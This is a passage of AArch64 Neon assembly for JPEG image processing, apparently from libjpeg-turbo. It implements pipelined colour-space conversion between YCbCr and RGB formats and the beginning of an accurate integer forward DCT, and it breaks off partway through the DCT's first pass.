sqshlu v29.8h, v28.8h, #8
sri v25.8h, v21.8h, #5
sri v25.8h, v29.8h, #11
.endif
.endm
/*
 * Software-pipelined steady-state iteration: stage 2 of chunk N is
 * interleaved with the loads and stage 1 of chunk N+1 to hide memory
 * latency, then the finished chunk is stored.
 */
.macro do_yuv_to_rgb_stage2_store_load_stage1 fast_st3
rshrn v20.4h, v20.4s, #15
rshrn v24.4h, v24.4s, #14
rshrn v28.4h, v28.4s, #14
ld1 {v4.8b}, [U], 8
rshrn2 v20.8h, v22.4s, #15
rshrn2 v24.8h, v26.4s, #14
rshrn2 v28.8h, v30.4s, #14
ld1 {v5.8b}, [V], 8
uaddw v20.8h, v20.8h, v0.8b
uaddw v24.8h, v24.8h, v0.8b
uaddw v28.8h, v28.8h, v0.8b
.if \bpp != 16 /**************** rgb24/rgb32 ******************************/
sqxtun v1\g_offs\defsize, v20.8h
ld1 {v0.8b}, [Y], 8
sqxtun v1\r_offs\defsize, v24.8h
prfm pldl1keep, [U, #64]
prfm pldl1keep, [V, #64]
prfm pldl1keep, [Y, #64]
sqxtun v1\b_offs\defsize, v28.8h
uaddw v6.8h, v2.8h, v4.8b /* v6.16b = u - 128 */
uaddw v8.8h, v2.8h, v5.8b /* q2 = v - 128 */
smull v20.4s, v6.4h, v1.h[1] /* multiply by -11277 */
smlal v20.4s, v8.4h, v1.h[2] /* multiply by -23401 */
smull2 v22.4s, v6.8h, v1.h[1] /* multiply by -11277 */
smlal2 v22.4s, v8.8h, v1.h[2] /* multiply by -23401 */
smull v24.4s, v8.4h, v1.h[0] /* multiply by 22971 */
smull2 v26.4s, v8.8h, v1.h[0] /* multiply by 22971 */
.else /**************************** rgb565 ********************************/
sqshlu v21.8h, v20.8h, #8
sqshlu v25.8h, v24.8h, #8
sqshlu v29.8h, v28.8h, #8
uaddw v6.8h, v2.8h, v4.8b /* v6.16b = u - 128 */
uaddw v8.8h, v2.8h, v5.8b /* q2 = v - 128 */
ld1 {v0.8b}, [Y], 8
smull v20.4s, v6.4h, v1.h[1] /* multiply by -11277 */
smlal v20.4s, v8.4h, v1.h[2] /* multiply by -23401 */
smull2 v22.4s, v6.8h, v1.h[1] /* multiply by -11277 */
smlal2 v22.4s, v8.8h, v1.h[2] /* multiply by -23401 */
sri v25.8h, v21.8h, #5
smull v24.4s, v8.4h, v1.h[0] /* multiply by 22971 */
smull2 v26.4s, v8.8h, v1.h[0] /* multiply by 22971 */
prfm pldl1keep, [U, #64]
prfm pldl1keep, [V, #64]
prfm pldl1keep, [Y, #64]
sri v25.8h, v29.8h, #11
.endif
do_store \bpp, 8, \fast_st3
/* Start of next chunk's B-channel multiplies (completes stage 1). */
smull v28.4s, v6.4h, v1.h[3] /* multiply by 29033 */
smull2 v30.4s, v6.8h, v1.h[3] /* multiply by 29033 */
.endm
/* Unpipelined single-chunk conversion, used for the tail pixels. */
.macro do_yuv_to_rgb
do_yuv_to_rgb_stage1
do_yuv_to_rgb_stage2
.endm
.if \fast_st3 == 1
asm_function jsimd_ycc_\colorid\()_convert_neon
.else
asm_function jsimd_ycc_\colorid\()_convert_neon_slowst3
.endif
/* Argument and scratch register bindings (AAPCS64: args in x0-x7). */
OUTPUT_WIDTH .req w0
INPUT_BUF .req x1
INPUT_ROW .req w2
OUTPUT_BUF .req x3
NUM_ROWS .req w4
INPUT_BUF0 .req x5
INPUT_BUF1 .req x6
INPUT_BUF2 .req x1
RGB .req x7
Y .req x9
U .req x10
V .req x11
N .req w15
/* Reserve a 64-byte spill area for the callee-saved Neon registers. */
sub sp, sp, 64
mov x9, sp
/* Load constants to d1, d2, d3 (v0.4h is just used for padding) */
get_symbol_loc x15, Ljsimd_ycc_rgb_neon_consts
/* Save Neon registers */
st1 {v8.8b, v9.8b, v10.8b, v11.8b}, [x9], 32
st1 {v12.8b, v13.8b, v14.8b, v15.8b}, [x9], 32
ld1 {v0.4h, v1.4h}, [x15], 16
ld1 {v2.8h}, [x15]
/* Fetch the three component row-pointer arrays from input_buf. */
ldr INPUT_BUF0, [INPUT_BUF]
ldr INPUT_BUF1, [INPUT_BUF, #8]
ldr INPUT_BUF2, [INPUT_BUF, #16]
.unreq INPUT_BUF
/* Initially set v10, v11.4h, v12.8b, d13 to 0xFF.  v10/v13 cover the
 * X (alpha) slot for every 32-bpp layout; sqxtun overwrites whichever
 * of v10..v13 carry real R/G/B data. */
movi v10.16b, #255
movi v13.16b, #255
/* Outer loop over scanlines */
cmp NUM_ROWS, #1
b.lt 9f
0:
ldr Y, [INPUT_BUF0, INPUT_ROW, uxtw #3]
ldr U, [INPUT_BUF1, INPUT_ROW, uxtw #3]
mov N, OUTPUT_WIDTH
ldr V, [INPUT_BUF2, INPUT_ROW, uxtw #3]
add INPUT_ROW, INPUT_ROW, #1
ldr RGB, [OUTPUT_BUF], #8
/* Inner loop over pixels */
subs N, N, #8
b.lt 3f /* fewer than 8 pixels: go straight to the tail */
do_load 8
do_yuv_to_rgb_stage1
subs N, N, #8
b.lt 2f
1:
/* Steady state: convert chunk N while loading chunk N+1. */
do_yuv_to_rgb_stage2_store_load_stage1 \fast_st3
subs N, N, #8
b.ge 1b
2:
/* Drain the pipeline: finish and store the last full chunk. */
do_yuv_to_rgb_stage2
do_store \bpp, 8, \fast_st3
tst N, #7
b.eq 8f
3:
/* Tail: load the remaining 1-7 pixels by bit of N, then convert
 * once and store in matching pieces. */
tst N, #4
b.eq 3f
do_load 4
3:
tst N, #2
b.eq 4f
do_load 2
4:
tst N, #1
b.eq 5f
do_load 1
5:
do_yuv_to_rgb
tst N, #4
b.eq 6f
do_store \bpp, 4, \fast_st3
6:
tst N, #2
b.eq 7f
do_store \bpp, 2, \fast_st3
7:
tst N, #1
b.eq 8f
do_store \bpp, 1, \fast_st3
8:
subs NUM_ROWS, NUM_ROWS, #1
b.gt 0b
9:
/* Restore all registers and return */
ld1 {v8.8b, v9.8b, v10.8b, v11.8b}, [sp], 32
ld1 {v12.8b, v13.8b, v14.8b, v15.8b}, [sp], 32
br x30
.unreq OUTPUT_WIDTH
.unreq INPUT_ROW
.unreq OUTPUT_BUF
.unreq NUM_ROWS
.unreq INPUT_BUF0
.unreq INPUT_BUF1
.unreq INPUT_BUF2
.unreq RGB
.unreq Y
.unreq U
.unreq V
.unreq N
.purgem do_yuv_to_rgb
.purgem do_yuv_to_rgb_stage1
.purgem do_yuv_to_rgb_stage2
.purgem do_yuv_to_rgb_stage2_store_load_stage1
.endm
/*
 * Instantiate one converter per output pixel format.  The two trailing
 * fast_st3=0 lines re-emit the 24-bpp converters as *_slowst3 variants
 * that avoid interleaved st3 stores.  The helper macros are purged so
 * the names can be redefined for the RGB->YCbCr direction below.
 */
/*--------------------------------- id ----- bpp R rsize G gsize B bsize defsize fast_st3*/
generate_jsimd_ycc_rgb_convert_neon extrgb, 24, 0, .4h, 1, .4h, 2, .4h, .8b, 1
generate_jsimd_ycc_rgb_convert_neon extbgr, 24, 2, .4h, 1, .4h, 0, .4h, .8b, 1
generate_jsimd_ycc_rgb_convert_neon extrgbx, 32, 0, .4h, 1, .4h, 2, .4h, .8b, 1
generate_jsimd_ycc_rgb_convert_neon extbgrx, 32, 2, .4h, 1, .4h, 0, .4h, .8b, 1
generate_jsimd_ycc_rgb_convert_neon extxbgr, 32, 3, .4h, 2, .4h, 1, .4h, .8b, 1
generate_jsimd_ycc_rgb_convert_neon extxrgb, 32, 1, .4h, 2, .4h, 3, .4h, .8b, 1
generate_jsimd_ycc_rgb_convert_neon rgb565, 16, 0, .4h, 0, .4h, 0, .4h, .8b, 1
generate_jsimd_ycc_rgb_convert_neon extrgb, 24, 0, .4h, 1, .4h, 2, .4h, .8b, 0
generate_jsimd_ycc_rgb_convert_neon extbgr, 24, 2, .4h, 1, .4h, 0, .4h, .8b, 0
.purgem do_load
.purgem do_store
/*****************************************************************************/
/*
* jsimd_extrgb_ycc_convert_neon
* jsimd_extbgr_ycc_convert_neon
* jsimd_extrgbx_ycc_convert_neon
* jsimd_extbgrx_ycc_convert_neon
* jsimd_extxbgr_ycc_convert_neon
* jsimd_extxrgb_ycc_convert_neon
*
* Colorspace conversion RGB -> YCbCr
*/
/*
 * do_store size
 *
 * Store one chunk of converted samples for the RGB->YCbCr direction.
 * Y/U/V alias the three output row pointers (post-incremented); the
 * converted samples sit in v20 (Y), v21 (Cb), v22 (Cr).  Lane layout
 * matches the loader: size 8 writes lanes 0-7, and the 4/2/1 variants
 * write lanes 0-3, 4-5 and 6 so tail chunks compose.
 */
.macro do_store size
.if \size == 8
st1 {v20.8b}, [Y], #8
st1 {v21.8b}, [U], #8
st1 {v22.8b}, [V], #8
.elseif \size == 4
st1 {v20.b}[0], [Y], #1
st1 {v20.b}[1], [Y], #1
st1 {v20.b}[2], [Y], #1
st1 {v20.b}[3], [Y], #1
st1 {v21.b}[0], [U], #1
st1 {v21.b}[1], [U], #1
st1 {v21.b}[2], [U], #1
st1 {v21.b}[3], [U], #1
st1 {v22.b}[0], [V], #1
st1 {v22.b}[1], [V], #1
st1 {v22.b}[2], [V], #1
st1 {v22.b}[3], [V], #1
.elseif \size == 2
st1 {v20.b}[4], [Y], #1
st1 {v20.b}[5], [Y], #1
st1 {v21.b}[4], [U], #1
st1 {v21.b}[5], [U], #1
st1 {v22.b}[4], [V], #1
st1 {v22.b}[5], [V], #1
.elseif \size == 1
st1 {v20.b}[6], [Y], #1
st1 {v21.b}[6], [U], #1
st1 {v22.b}[6], [V], #1
.else
.error unsupported macroblock size
.endif
.endm
/*
 * do_load bpp, size, fast_ld3
 *
 * Load one chunk of interleaved RGB pixels for the RGB->YCbCr
 * converter.  RGB aliases the input row pointer (post-incremented);
 * channels are de-interleaved into v10/v11/v12 (plus v13 for the X
 * byte at 32 bpp, which is simply discarded by the converter).
 * fast_ld3 == 0 replaces the interleaved ld3 with byte-lane loads for
 * the *_slowld3 entry points.  Lane numbering matches do_store.
 */
.macro do_load bpp, size, fast_ld3
.if \bpp == 24
.if \size == 8
.if \fast_ld3 == 1
/* One interleaved load reads all 24 bytes (8 x RGB). */
ld3 {v10.8b, v11.8b, v12.8b}, [RGB], #24
.else
/* ld3-free fallback: same 24 bytes, one lane at a time. */
ld1 {v10.b}[0], [RGB], #1
ld1 {v11.b}[0], [RGB], #1
ld1 {v12.b}[0], [RGB], #1
ld1 {v10.b}[1], [RGB], #1
ld1 {v11.b}[1], [RGB], #1
ld1 {v12.b}[1], [RGB], #1
ld1 {v10.b}[2], [RGB], #1
ld1 {v11.b}[2], [RGB], #1
ld1 {v12.b}[2], [RGB], #1
ld1 {v10.b}[3], [RGB], #1
ld1 {v11.b}[3], [RGB], #1
ld1 {v12.b}[3], [RGB], #1
ld1 {v10.b}[4], [RGB], #1
ld1 {v11.b}[4], [RGB], #1
ld1 {v12.b}[4], [RGB], #1
ld1 {v10.b}[5], [RGB], #1
ld1 {v11.b}[5], [RGB], #1
ld1 {v12.b}[5], [RGB], #1
ld1 {v10.b}[6], [RGB], #1
ld1 {v11.b}[6], [RGB], #1
ld1 {v12.b}[6], [RGB], #1
ld1 {v10.b}[7], [RGB], #1
ld1 {v11.b}[7], [RGB], #1
ld1 {v12.b}[7], [RGB], #1
.endif
prfm pldl1keep, [RGB, #128]
.elseif \size == 4
ld3 {v10.b, v11.b, v12.b}[0], [RGB], #3
ld3 {v10.b, v11.b, v12.b}[1], [RGB], #3
ld3 {v10.b, v11.b, v12.b}[2], [RGB], #3
ld3 {v10.b, v11.b, v12.b}[3], [RGB], #3
.elseif \size == 2
ld3 {v10.b, v11.b, v12.b}[4], [RGB], #3
ld3 {v10.b, v11.b, v12.b}[5], [RGB], #3
.elseif \size == 1
ld3 {v10.b, v11.b, v12.b}[6], [RGB], #3
.else
.error unsupported macroblock size
.endif
.elseif \bpp == 32
.if \size == 8
ld4 {v10.8b, v11.8b, v12.8b, v13.8b}, [RGB], #32
prfm pldl1keep, [RGB, #128]
.elseif \size == 4
ld4 {v10.b, v11.b, v12.b, v13.b}[0], [RGB], #4
ld4 {v10.b, v11.b, v12.b, v13.b}[1], [RGB], #4
ld4 {v10.b, v11.b, v12.b, v13.b}[2], [RGB], #4
ld4 {v10.b, v11.b, v12.b, v13.b}[3], [RGB], #4
.elseif \size == 2
ld4 {v10.b, v11.b, v12.b, v13.b}[4], [RGB], #4
ld4 {v10.b, v11.b, v12.b, v13.b}[5], [RGB], #4
.elseif \size == 1
ld4 {v10.b, v11.b, v12.b, v13.b}[6], [RGB], #4
.else
.error unsupported macroblock size
.endif
.else
.error unsupported bpp
.endif
.endm
/*
 * generate_jsimd_rgb_ycc_convert_neon colorid, bpp, r_offs, g_offs,
 *                                     b_offs, fast_ld3
 *
 * Emits one complete RGB->YCbCr row-conversion function,
 * jsimd_<colorid>_ycc_convert_neon (or *_slowld3 when fast_ld3 == 0).
 * r_offs/g_offs/b_offs select which of v10..v13 holds each input
 * channel after do_load, so one body serves every byte order.
 *
 * C-equivalent signature (from the register bindings below):
 *   void jsimd_*_ycc_convert_neon(JDIMENSION output_width,
 *                                 JSAMPARRAY input_buf, JSAMPIMAGE output_buf,
 *                                 JDIMENSION output_row, int num_rows)
 * NOTE(review): argument names inferred from the .req aliases; confirm
 * against the C prototype in the surrounding project.
 */
.macro generate_jsimd_rgb_ycc_convert_neon colorid, bpp, r_offs, g_offs, \
b_offs, fast_ld3
/*
 * 2-stage pipelined RGB->YCbCr conversion
 */
/*
 * Stage 1: zero-extend R/G/B bytes to 16 bits, seed the Cb/Cr
 * accumulators with the rounding/bias constant held in v1.4s (rev64
 * replicates it into v18/v26/v28/v30 -- presumably the bias word sits
 * in the other half of v1; TODO confirm against the consts table),
 * then run the weighted multiply-accumulate per channel.
 * Accumulators: v14/v16 = Y, v18/v26 = Cb, v28/v30 = Cr (lo/hi).
 */
.macro do_rgb_to_yuv_stage1
ushll v4.8h, v1\r_offs\().8b, #0 /* r = v4 */
ushll v6.8h, v1\g_offs\().8b, #0 /* g = v6 */
ushll v8.8h, v1\b_offs\().8b, #0 /* b = v8 */
rev64 v18.4s, v1.4s
rev64 v26.4s, v1.4s
rev64 v28.4s, v1.4s
rev64 v30.4s, v1.4s
umull v14.4s, v4.4h, v0.h[0]
umull2 v16.4s, v4.8h, v0.h[0]
umlsl v18.4s, v4.4h, v0.h[3]
umlsl2 v26.4s, v4.8h, v0.h[3]
umlal v28.4s, v4.4h, v0.h[5]
umlal2 v30.4s, v4.8h, v0.h[5]
umlal v14.4s, v6.4h, v0.h[1]
umlal2 v16.4s, v6.8h, v0.h[1]
umlsl v18.4s, v6.4h, v0.h[4]
umlsl2 v26.4s, v6.8h, v0.h[4]
umlsl v28.4s, v6.4h, v0.h[6]
umlsl2 v30.4s, v6.8h, v0.h[6]
umlal v14.4s, v8.4h, v0.h[2]
umlal2 v16.4s, v8.8h, v0.h[2]
umlal v18.4s, v8.4h, v0.h[5]
umlal2 v26.4s, v8.8h, v0.h[5]
umlsl v28.4s, v8.4h, v0.h[7]
umlsl2 v30.4s, v8.8h, v0.h[7]
.endm
/*
 * Stage 2: descale the 16.16 fixed-point accumulators (Y with
 * rounding, Cb/Cr truncating -- their rounding term was folded into
 * the stage-1 bias) and narrow to bytes in v20/v21/v22.
 */
.macro do_rgb_to_yuv_stage2
rshrn v20.4h, v14.4s, #16
shrn v22.4h, v18.4s, #16
shrn v24.4h, v28.4s, #16
rshrn2 v20.8h, v16.4s, #16
shrn2 v22.8h, v26.4s, #16
shrn2 v24.8h, v30.4s, #16
xtn v20.8b, v20.8h /* v20 = y */
xtn v21.8b, v22.8h /* v21 = u */
xtn v22.8b, v24.8h /* v22 = v */
.endm
/* Unpipelined single-chunk conversion, used for the tail pixels. */
.macro do_rgb_to_yuv
do_rgb_to_yuv_stage1
do_rgb_to_yuv_stage2
.endm
/* TODO: expand macros and interleave instructions if some in-order
 * AArch64 processor actually can dual-issue LOAD/STORE with ALU */
.macro do_rgb_to_yuv_stage2_store_load_stage1 fast_ld3
do_rgb_to_yuv_stage2
do_load \bpp, 8, \fast_ld3
st1 {v20.8b}, [Y], #8
st1 {v21.8b}, [U], #8
st1 {v22.8b}, [V], #8
do_rgb_to_yuv_stage1
.endm
.if \fast_ld3 == 1
asm_function jsimd_\colorid\()_ycc_convert_neon
.else
asm_function jsimd_\colorid\()_ycc_convert_neon_slowld3
.endif
/* Argument and scratch register bindings (AAPCS64: args in x0-x7). */
OUTPUT_WIDTH .req w0
INPUT_BUF .req x1
OUTPUT_BUF .req x2
OUTPUT_ROW .req w3
NUM_ROWS .req w4
OUTPUT_BUF0 .req x5
OUTPUT_BUF1 .req x6
OUTPUT_BUF2 .req x2 /* OUTPUT_BUF */
RGB .req x7
Y .req x9
U .req x10
V .req x11
N .req w12
/* Load constants to d0, d1, d2, d3 */
get_symbol_loc x13, Ljsimd_rgb_ycc_neon_consts
ld1 {v0.8h, v1.8h}, [x13]
/* Fetch the three component row-pointer arrays from output_buf. */
ldr OUTPUT_BUF0, [OUTPUT_BUF]
ldr OUTPUT_BUF1, [OUTPUT_BUF, #8]
ldr OUTPUT_BUF2, [OUTPUT_BUF, #16]
.unreq OUTPUT_BUF
/* Save Neon registers */
sub sp, sp, #64
mov x9, sp
st1 {v8.8b, v9.8b, v10.8b, v11.8b}, [x9], 32
st1 {v12.8b, v13.8b, v14.8b, v15.8b}, [x9], 32
/* Outer loop over scanlines */
cmp NUM_ROWS, #1
b.lt 9f
0:
ldr Y, [OUTPUT_BUF0, OUTPUT_ROW, uxtw #3]
ldr U, [OUTPUT_BUF1, OUTPUT_ROW, uxtw #3]
mov N, OUTPUT_WIDTH
ldr V, [OUTPUT_BUF2, OUTPUT_ROW, uxtw #3]
add OUTPUT_ROW, OUTPUT_ROW, #1
ldr RGB, [INPUT_BUF], #8
/* Inner loop over pixels */
subs N, N, #8
b.lt 3f /* fewer than 8 pixels: go straight to the tail */
do_load \bpp, 8, \fast_ld3
do_rgb_to_yuv_stage1
subs N, N, #8
b.lt 2f
1:
/* Steady state: convert chunk N while loading chunk N+1. */
do_rgb_to_yuv_stage2_store_load_stage1 \fast_ld3
subs N, N, #8
b.ge 1b
2:
/* Drain the pipeline: finish and store the last full chunk. */
do_rgb_to_yuv_stage2
do_store 8
tst N, #7
b.eq 8f
3:
/* Tail: load the remaining 1-7 pixels by bit of N, convert once,
 * and store in matching pieces. */
tbz N, #2, 3f
do_load \bpp, 4, \fast_ld3
3:
tbz N, #1, 4f
do_load \bpp, 2, \fast_ld3
4:
tbz N, #0, 5f
do_load \bpp, 1, \fast_ld3
5:
do_rgb_to_yuv
tbz N, #2, 6f
do_store 4
6:
tbz N, #1, 7f
do_store 2
7:
tbz N, #0, 8f
do_store 1
8:
subs NUM_ROWS, NUM_ROWS, #1
b.gt 0b
9:
/* Restore all registers and return */
ld1 {v8.8b, v9.8b, v10.8b, v11.8b}, [sp], 32
ld1 {v12.8b, v13.8b, v14.8b, v15.8b}, [sp], 32
br x30
.unreq OUTPUT_WIDTH
.unreq OUTPUT_ROW
.unreq INPUT_BUF
.unreq NUM_ROWS
.unreq OUTPUT_BUF0
.unreq OUTPUT_BUF1
.unreq OUTPUT_BUF2
.unreq RGB
.unreq Y
.unreq U
.unreq V
.unreq N
.purgem do_rgb_to_yuv
.purgem do_rgb_to_yuv_stage1
.purgem do_rgb_to_yuv_stage2
.purgem do_rgb_to_yuv_stage2_store_load_stage1
.endm
/*
 * Instantiate one converter per input pixel format.  The two trailing
 * Fast-LD3=0 lines re-emit the 24-bpp converters as *_slowld3 variants
 * that avoid interleaved ld3 loads.  The helper macros are purged to
 * free the names for later sections of the file.
 */
/*--------------------------------- id ----- bpp R G B Fast LD3 */
generate_jsimd_rgb_ycc_convert_neon extrgb, 24, 0, 1, 2, 1
generate_jsimd_rgb_ycc_convert_neon extbgr, 24, 2, 1, 0, 1
generate_jsimd_rgb_ycc_convert_neon extrgbx, 32, 0, 1, 2, 1
generate_jsimd_rgb_ycc_convert_neon extbgrx, 32, 2, 1, 0, 1
generate_jsimd_rgb_ycc_convert_neon extxbgr, 32, 3, 2, 1, 1
generate_jsimd_rgb_ycc_convert_neon extxrgb, 32, 1, 2, 3, 1
generate_jsimd_rgb_ycc_convert_neon extrgb, 24, 0, 1, 2, 0
generate_jsimd_rgb_ycc_convert_neon extbgr, 24, 2, 1, 0, 0
.purgem do_load
.purgem do_store
/*****************************************************************************/
/*
* jsimd_fdct_islow_neon
*
* This file contains a slower but more accurate integer implementation of the
* forward DCT (Discrete Cosine Transform). The following code is based
 * directly on the IJG's original jfdctint.c; see the jfdctint.c for
* more details.
*
* TODO: can be combined with 'jsimd_convsamp_neon' to get
* rid of a bunch of VLD1.16 instructions
*/
/*
 * Fixed-point parameters for the slow-but-accurate forward DCT:
 * CONST_BITS fractional bits during the multiply stages, with
 * PASS1_BITS of extra precision carried between the two passes.
 */
#define CONST_BITS 13
#define PASS1_BITS 2
/* Descale (right-shift) amounts applied after pass 1 and pass 2. */
#define DESCALE_P1 (CONST_BITS - PASS1_BITS)
#define DESCALE_P2 (CONST_BITS + PASS1_BITS)
/*
 * Lane selectors for the DCT multiplier constants held in v0/v1
 * (loaded below from Ljsimd_fdct_islow_neon_consts).  Naming encodes
 * sign and magnitude: XFIX_P_0_298 = +FIX(0.298631336),
 * XFIX_N_1_847 = -FIX(1.847759065), etc.
 */
#define XFIX_P_0_298 v0.h[0]
#define XFIX_N_0_390 v0.h[1]
#define XFIX_P_0_541 v0.h[2]
#define XFIX_P_0_765 v0.h[3]
#define XFIX_N_0_899 v0.h[4]
#define XFIX_P_1_175 v0.h[5]
#define XFIX_P_1_501 v0.h[6]
#define XFIX_N_1_847 v0.h[7]
#define XFIX_N_1_961 v1.h[0]
#define XFIX_P_2_053 v1.h[1]
#define XFIX_N_2_562 v1.h[2]
#define XFIX_P_3_072 v1.h[3]
/*
 * jsimd_fdct_islow_neon: accurate (ISLOW) forward DCT of one 8x8 block.
 *
 * C-equivalent: void jsimd_fdct_islow_neon(DCTELEM *data)
 * In:    x0 = data (64 16-bit coefficients, row-major, transformed in place)
 * Note:  v0/v1 hold the XFIX_* multiplier constants for the whole routine.
 *        Only the low 64 bits of v8-v15 are callee-saved under AAPCS64,
 *        hence the .8b spills below.
 * Fix:   return via RET instead of BR x30 so the return-address predictor
 *        (and BTI return semantics) work correctly.
 */
asm_function jsimd_fdct_islow_neon
DATA .req x0
TMP .req x9
/* Load constants */
get_symbol_loc TMP, Ljsimd_fdct_islow_neon_consts
ld1 {v0.8h, v1.8h}, [TMP]
/* Save Neon registers (AAPCS64: low halves of v8-v15 are callee-saved) */
sub sp, sp, #64
mov x10, sp
st1 {v8.8b, v9.8b, v10.8b, v11.8b}, [x10], 32
st1 {v12.8b, v13.8b, v14.8b, v15.8b}, [x10], 32
/* Load all DATA into Neon registers with the following allocation:
 * 0 1 2 3 | 4 5 6 7
 * ---------+--------
 * 0 | d16 | d17 | v16.8h
 * 1 | d18 | d19 | v17.8h
 * 2 | d20 | d21 | v18.8h
 * 3 | d22 | d23 | v19.8h
 * 4 | d24 | d25 | v20.8h
 * 5 | d26 | d27 | v21.8h
 * 6 | d28 | d29 | v22.8h
 * 7 | d30 | d31 | v23.8h
 */
ld1 {v16.8h, v17.8h, v18.8h, v19.8h}, [DATA], 64
ld1 {v20.8h, v21.8h, v22.8h, v23.8h}, [DATA]
sub DATA, DATA, #64
/* Transpose so pass 1 operates on columns */
transpose_8x8 v16, v17, v18, v19, v20, v21, v22, v23, v31, v2, v3, v4
/* 1-D FDCT */
add v24.8h, v16.8h, v23.8h /* tmp0 = dataptr[0] + dataptr[7]; */
sub v31.8h, v16.8h, v23.8h /* tmp7 = dataptr[0] - dataptr[7]; */
add v25.8h, v17.8h, v22.8h /* tmp1 = dataptr[1] + dataptr[6]; */
sub v30.8h, v17.8h, v22.8h /* tmp6 = dataptr[1] - dataptr[6]; */
add v26.8h, v18.8h, v21.8h /* tmp2 = dataptr[2] + dataptr[5]; */
sub v29.8h, v18.8h, v21.8h /* tmp5 = dataptr[2] - dataptr[5]; */
add v27.8h, v19.8h, v20.8h /* tmp3 = dataptr[3] + dataptr[4]; */
sub v28.8h, v19.8h, v20.8h /* tmp4 = dataptr[3] - dataptr[4]; */
/* even part */
add v8.8h, v24.8h, v27.8h /* tmp10 = tmp0 + tmp3; */
sub v9.8h, v24.8h, v27.8h /* tmp13 = tmp0 - tmp3; */
add v10.8h, v25.8h, v26.8h /* tmp11 = tmp1 + tmp2; */
sub v11.8h, v25.8h, v26.8h /* tmp12 = tmp1 - tmp2; */
add v16.8h, v8.8h, v10.8h /* tmp10 + tmp11 */
sub v20.8h, v8.8h, v10.8h /* tmp10 - tmp11 */
add v18.8h, v11.8h, v9.8h /* tmp12 + tmp13 */
shl v16.8h, v16.8h, #PASS1_BITS /* dataptr[0] = (DCTELEM)LEFT_SHIFT(tmp10 + tmp11, PASS1_BITS); */
shl v20.8h, v20.8h, #PASS1_BITS /* dataptr[4] = (DCTELEM)LEFT_SHIFT(tmp10 - tmp11, PASS1_BITS); */
smull2 v24.4s, v18.8h, XFIX_P_0_541 /* z1 hi = MULTIPLY(tmp12 + tmp13, XFIX_P_0_541); */
smull v18.4s, v18.4h, XFIX_P_0_541 /* z1 lo = MULTIPLY(tmp12 + tmp13, XFIX_P_0_541); */
mov v22.16b, v18.16b
mov v25.16b, v24.16b
smlal v18.4s, v9.4h, XFIX_P_0_765 /* lo z1 + MULTIPLY(tmp13, XFIX_P_0_765) */
smlal2 v24.4s, v9.8h, XFIX_P_0_765 /* hi z1 + MULTIPLY(tmp13, XFIX_P_0_765) */
smlal v22.4s, v11.4h, XFIX_N_1_847 /* lo z1 + MULTIPLY(tmp12, XFIX_N_1_847) */
smlal2 v25.4s, v11.8h, XFIX_N_1_847 /* hi z1 + MULTIPLY(tmp12, XFIX_N_1_847) */
rshrn v18.4h, v18.4s, #DESCALE_P1
rshrn v22.4h, v22.4s, #DESCALE_P1
rshrn2 v18.8h, v24.4s, #DESCALE_P1 /* dataptr[2] = (DCTELEM)DESCALE(z1 + MULTIPLY(tmp13, XFIX_P_0_765), CONST_BITS-PASS1_BITS); */
rshrn2 v22.8h, v25.4s, #DESCALE_P1 /* dataptr[6] = (DCTELEM)DESCALE(z1 + MULTIPLY(tmp12, XFIX_N_1_847), CONST_BITS-PASS1_BITS); */
/* Odd part */
add v8.8h, v28.8h, v31.8h /* z1 = tmp4 + tmp7; */
add v9.8h, v29.8h, v30.8h /* z2 = tmp5 + tmp6; */
add v10.8h, v28.8h, v30.8h /* z3 = tmp4 + tmp6; */
add v11.8h, v29.8h, v31.8h /* z4 = tmp5 + tmp7; */
smull v4.4s, v10.4h, XFIX_P_1_175 /* z5 lo = z3 lo * XFIX_P_1_175 */
smull2 v5.4s, v10.8h, XFIX_P_1_175
smlal v4.4s, v11.4h, XFIX_P_1_175 /* z5 = MULTIPLY(z3 + z4, FIX_1_175875602); */
smlal2 v5.4s, v11.8h, XFIX_P_1_175
smull2 v24.4s, v28.8h, XFIX_P_0_298
smull2 v25.4s, v29.8h, XFIX_P_2_053
smull2 v26.4s, v30.8h, XFIX_P_3_072
smull2 v27.4s, v31.8h, XFIX_P_1_501
smull v28.4s, v28.4h, XFIX_P_0_298 /* tmp4 = MULTIPLY(tmp4, FIX_0_298631336); */
smull v29.4s, v29.4h, XFIX_P_2_053 /* tmp5 = MULTIPLY(tmp5, FIX_2_053119869); */
smull v30.4s, v30.4h, XFIX_P_3_072 /* tmp6 = MULTIPLY(tmp6, FIX_3_072711026); */
smull v31.4s, v31.4h, XFIX_P_1_501 /* tmp7 = MULTIPLY(tmp7, FIX_1_501321110); */
smull2 v12.4s, v8.8h, XFIX_N_0_899
smull2 v13.4s, v9.8h, XFIX_N_2_562
smull2 v14.4s, v10.8h, XFIX_N_1_961
smull2 v15.4s, v11.8h, XFIX_N_0_390
smull v8.4s, v8.4h, XFIX_N_0_899 /* z1 = MULTIPLY(z1, -FIX_0_899976223); */
smull v9.4s, v9.4h, XFIX_N_2_562 /* z2 = MULTIPLY(z2, -FIX_2_562915447); */
smull v10.4s, v10.4h, XFIX_N_1_961 /* z3 = MULTIPLY(z3, -FIX_1_961570560); */
smull v11.4s, v11.4h, XFIX_N_0_390 /* z4 = MULTIPLY(z4, -FIX_0_390180644); */
add v10.4s, v10.4s, v4.4s /* z3 += z5 */
add v14.4s, v14.4s, v5.4s
add v11.4s, v11.4s, v4.4s /* z4 += z5 */
add v15.4s, v15.4s, v5.4s
add v28.4s, v28.4s, v8.4s /* tmp4 += z1 */
add v24.4s, v24.4s, v12.4s
add v29.4s, v29.4s, v9.4s /* tmp5 += z2 */
add v25.4s, v25.4s, v13.4s
add v30.4s, v30.4s, v10.4s /* tmp6 += z3 */
add v26.4s, v26.4s, v14.4s
add v31.4s, v31.4s, v11.4s /* tmp7 += z4 */
add v27.4s, v27.4s, v15.4s
add v28.4s, v28.4s, v10.4s /* tmp4 += z3 */
add v24.4s, v24.4s, v14.4s
add v29.4s, v29.4s, v11.4s /* tmp5 += z4 */
add v25.4s, v25.4s, v15.4s
add v30.4s, v30.4s, v9.4s /* tmp6 += z2 */
add v26.4s, v26.4s, v13.4s
add v31.4s, v31.4s, v8.4s /* tmp7 += z1 */
add v27.4s, v27.4s, v12.4s
rshrn v23.4h, v28.4s, #DESCALE_P1
rshrn v21.4h, v29.4s, #DESCALE_P1
rshrn v19.4h, v30.4s, #DESCALE_P1
rshrn v17.4h, v31.4s, #DESCALE_P1
rshrn2 v23.8h, v24.4s, #DESCALE_P1 /* dataptr[7] = (DCTELEM)DESCALE(tmp4 + z1 + z3, CONST_BITS-PASS1_BITS); */
